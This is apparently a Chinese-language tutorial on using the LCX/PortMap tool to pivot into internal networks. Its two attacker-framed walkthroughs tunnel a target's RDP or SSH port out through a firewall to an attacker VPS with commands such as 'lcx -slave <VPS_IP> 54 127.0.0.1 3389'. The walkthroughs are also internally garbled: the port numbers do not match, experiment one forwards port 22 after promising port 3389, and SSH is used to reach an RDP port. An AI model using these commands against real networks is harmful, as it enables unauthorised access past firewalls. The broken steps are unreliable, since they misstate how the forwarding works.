LCX for Linux:内网渗透与端口转发工具详解
LCX是一款功能强大的端口转发和端口映射工具,分为Windows版和Linux版(PortMap),它的主要功能包括端口映射和端口转发,常用于在内网渗透测试中突破网络限制,本文将详细介绍LCX for Linux的使用方法及其应用场景,并通过两个实验展示其具体操作。
一、LCX for Linux简介
LCX for Linux版本称为PortMap,主要用于在Linux系统上进行端口转发和端口映射,其主要功能包括:
端口映射:将本地端口映射到远程主机的指定端口。
端口转发:将本地或远程端口的流量转发到指定的端口。
在使用LCX之前,需要确保内网主机能够访问外网IP,可以通过ping命令检测网络连通性。
二、LCX for Linux的基本用法
LCX for Linux的使用主要涉及以下几个参数:
-m method
:指定操作模式,有1、2、3三种模式。
1
:监听PORT1并连接到HOST2:PORT2。
2
:监听PORT1和PORT2。
3
:连接到HOST1:PORT1和HOST2:PORT2。
-h1 host1
:指定第一个主机。
-p1 port1
:指定第一个端口。
-h2 host2
:指定第二个主机。
-p2 port2
:指定第二个端口。
-v
:显示版本信息。
-log filename
:记录日志到指定文件。
三、实验一:通过防火墙访问内网3389端口
1. 实验场景
某公司内部网络配置了严格的防火墙规则,仅允许Web访问(80端口),但不允许外部访问3389端口,攻击者希望通过LCX工具实现对内网3389端口的访问。
2. 实验环境
攻击机器(公网IP):192.168.14.137
Web服务器(内网IP):192.168.14.135
3. 实验步骤
1、在攻击机器上设置端口转发:
./portmap -m 2 -p1 6666 -h2 192.168.14.135 -p2 7777
这条命令表示在攻击机器上监听6666端口,并将流量转发到Web服务器的7777端口。
2、在Web服务器上设置端口转发:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.14.137 -p2 6666
这条命令表示将Web服务器的22端口流量转发到攻击机器的6666端口。
3、验证转发是否成功:
在攻击机器上使用SSH连接Web服务器的22端口:
ssh -p 7777 user@192.168.14.137
如果连接成功,说明端口转发设置正确。
四、实验二:Web服务器80端口转发至内网3389端口
1. 实验场景
Web服务器开启了80端口,但3389端口不允许出网,攻击者希望将Web服务器的3389端口流量转发到外网服务器的54端口,并通过外网服务器进一步转发到本地的1111端口进行访问。
2. 实验环境
攻击者VPS(公网IP)
内网攻击者机器:192.168.14.137
内网靶机:192.168.14.135
3. 实验步骤
1、在靶机上设置端口转发:
lcx -slave <VPS_IP> 54 127.0.0.1 3389
这条命令表示将靶机的3389端口流量转发到VPS的54端口。
2、在VPS上设置端口转发:
./portmap -m 2 -p1 54 -h2 <VPS_IP> -p2 1111
这条命令表示在VPS上监听54端口,并将流量转发到本地的1111端口。
3、在攻击机器上连接VPS的1111端口:
ssh -p 1111 user@<VPS_IP>
如果连接成功,说明通过VPS成功访问了内网靶机的3389端口。
五、LCX工具的局限性与注意事项
尽管LCX是一款强大的工具,但它也存在一些局限性:
原始版本不支持Linux,可能需要使用第三方修改版。
在某些情况下可能会被杀毒软件查杀。
需要公网服务器作为中转站。
在使用LCX时,还需要注意以下几点:
确保网络连通性,内网主机必须能够访问外网IP。
配置防火墙规则以允许相应的端口通信。
注意权限问题,可能需要以root用户或使用sudo运行命令。
六、归纳
LCX for Linux(PortMap)是一款灵活且功能强大的端口转发和端口映射工具,适用于各种复杂的网络环境,通过合理配置,可以有效突破网络限制,实现对内网资源的访问,使用时也需要注意其局限性和潜在的安全风险,以确保网络安全。
各位小伙伴们,我刚刚为大家分享了有关“lcx for linux”的知识,希望对你们有所帮助。如果您还有其他相关问题需要解决,欢迎随时提出哦!